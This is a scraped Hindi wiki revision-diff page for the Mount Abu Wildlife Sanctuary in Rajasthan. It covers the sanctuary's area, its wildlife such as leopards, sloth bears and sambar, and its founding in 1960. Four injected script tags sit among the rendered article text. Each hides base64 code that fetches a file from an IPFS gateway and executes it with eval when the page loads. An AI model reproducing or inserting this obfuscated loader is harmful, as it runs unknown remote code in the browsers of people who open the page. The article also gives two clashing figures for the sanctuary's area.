Difference between revisions of "माउंट आबू वन्यजीव अभयारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अभ्यारण्य" to "अभयारण्य")
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Mount-Abu-Wildlife-Sanctuary.jpg
 +
|चित्र का नाम=माउंट आबू वन्यजीव अभयारण्य
 +
|विवरण='माउंट आबू वन्यजीव अभयारण्य'  [[माउण्ट आबू]] की पर्वतमालाओं के बीच स्थित है। यह बहुत ही सुन्दर और दर्शनीय स्थल है, जो कि 112 वर्ग कि.मी. में फैला हुआ है।
 +
|राज्य=[[राजस्थान]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[सिरोही]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=24° 33′ 0″ उत्तर, 72° 38′ 0″ पूर्व
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=पर्यटन स्थल
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Rajasthan/Hotel+Polo+View,+MDR+60,+Opp.+Polo+Ground,+Near+Taxi+Stand,+Dist.+Sirohi,+Machgoan,+Mount+Abu,+Rajasthan+307501/@25.7790786,72.4796296,8z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x396a3efaf7e30e37:0xb52b9b4506c088e5!2m2!1d74.2179326!2d27.0238036!1m5!1m1!1s0x395d2ae358f3df93:0xa7a7c9b4f8234883!2m2!1d72.7121346!2d24.5886754 गूगल मानचित्र]
 +
|संबंधित लेख=[[राजस्थान]], [[सिरोही]], [[राजस्थान पर्यटन]], [[तेंदुआ|तेंदुए]], [[मोर]], [[जंगली सूअर]],  [[माउण्ट आबू]]
 +
|शीर्षक 1=क्षेत्रफल
 +
|पाठ 1=112 वर्ग कि.मी.
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=माउंट आबू वन्यजीव अभयारण्य में पक्षियों की लगभग 250 और पौधों की 110 से भी ज़्यादा प्रजातियाँ देखी जा सकती हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''माउंट आबू वन्यजीव अभयारण्य''' ([[अंग्रेज़ी]]:''Mount Abu Wildlife Sanctuary'') [[राजस्थान]] राज्य के पश्चिमी ज़िले [[सिरोही]] के [[माउण्ट आबू]] की पर्वतमालाओं के बीच स्थित है। यह बहुत ही सुन्दर और दर्शनीय स्थल है, जो कि 112 वर्ग कि.मी. में फैला हुआ है। अभयारण्य माउण्ट आबू का प्रसिद्ध पर्यटन स्थल है।
 +
 
 +
*यह प्रसिद्ध अभयारण्य आबू रोड से बीस किलोमीटर की दूरी पर है।
 +
*इस अभयारण्य में मुख्य रूप से [[तेंदुआ|तेंदुए]], स्लोथबियर, [[मोर]], सांभर, [[चिंकारा]], [[जंगली सूअर]], नीलगाय, खरगोश, जंगली मुर्गा, तीतर और [[लंगूर]] आदि पाए जाते हैं।  
 +
*288 वर्ग किलोमीटर में फैले इस अभयारण्य की स्थापना सन [[1960]] में की गई थी।
 +
*यहाँ पक्षियों की लगभग 250 और पौधों की 110 से भी ज़्यादा प्रजातियाँ देखी जा सकती हैं।
 +
*पक्षियों में रुचि रखने वालों के लिए यह अभयारण्य एक आदर्श जगह है।
 +
 
 +
==वीथिका==
 +
<gallery widths="200">
 +
चित्र:Mount-Abu-Wildlife-Sanctuary-1.jpg|[[माउंट आबू वन्यजीव अभयारण्य]]
 +
</gallery>
 +
 
  
*यह अभयारण्य मांउट आबू का प्रसिद्ध पर्यटक स्थल है।
+
 
*यहाँ मुख्य रूप से तेंदुए, स्लोथबियर, वाइल्ड बोर, सांभर, चिंकारा और लंगूर पाए जाते हैं।
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
*288 वर्ग किमी. में फैले इस अभयारण्य की स्थापना 1960 में की गई थी।
 
*यहाँ पक्षियों की लगभग 250 और पौधों की 110 से ज़्यादा प्रजातियां देखी जा सकती हैं।
 
*पक्षियों में रुचि रखने वालों के लिए उपयुक्त जगह है।
 
{{लेख प्रगति  
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1  
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान के पर्यटन स्थल}}
+
{{राजस्थान के अभयारण्य}}{{राष्ट्रीय उद्यान और अभयारण्य}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]

Latest revision as of 11:18, 20 September 2016

mauant aboo vanyajiv abhayarany
vivaran 'mauant aboo vanyajiv abhayarany' maunt aboo ki parvatamalaoan ke bich sthit hai. yah bahut hi sundar aur darshaniy sthal hai, jo ki 112 varg ki.mi. mean phaila hua hai.
rajy rajasthan
zila sirohi
bhaugolik sthiti 24° 33′ 0″ uttar, 72° 38′ 0″ poorv
prasiddhi paryatan sthal
chitr:Map-icon.gif googal manachitr
sanbandhit lekh rajasthan, sirohi, rajasthan paryatan, teandue, mor, jangali sooar, maunt aboo kshetraphal 112 varg ki.mi.
any janakari mauant aboo vanyajiv abhayarany mean pakshiyoan ki lagabhag 250 aur paudhoan ki 110 se bhi zyada prajatiyaan dekhi ja sakati haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

mauant aboo vanyajiv abhayarany (aangrezi:Mount Abu Wildlife Sanctuary) rajasthan rajy ke pashchimi zile sirohi ke maunt aboo ki parvatamalaoan ke bich sthit hai. yah bahut hi sundar aur darshaniy sthal hai, jo ki 112 varg ki.mi. mean phaila hua hai. abhayarany maunt aboo ka prasiddh paryatan sthal hai.

  • yah prasiddh abhayarany aboo rod se bis kilomitar ki doori par hai.
  • is abhayarany mean mukhy roop se teandue, slothabiyar, mor, saanbhar, chiankara, jangali sooar, nilagay, kharagosh, jangali murga, titar aur langoor adi pae jate haian.
  • 288 varg kilomitar mean phaile is abhayarany ki sthapana san 1960 mean ki gee thi.
  • yahaan pakshiyoan ki lagabhag 250 aur paudhoan ki 110 se bhi zyada prajatiyaan dekhi ja sakati haian.
  • pakshiyoan mean ruchi rakhane valoan ke lie yah abhayarany ek adarsh jagah hai.

vithika



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>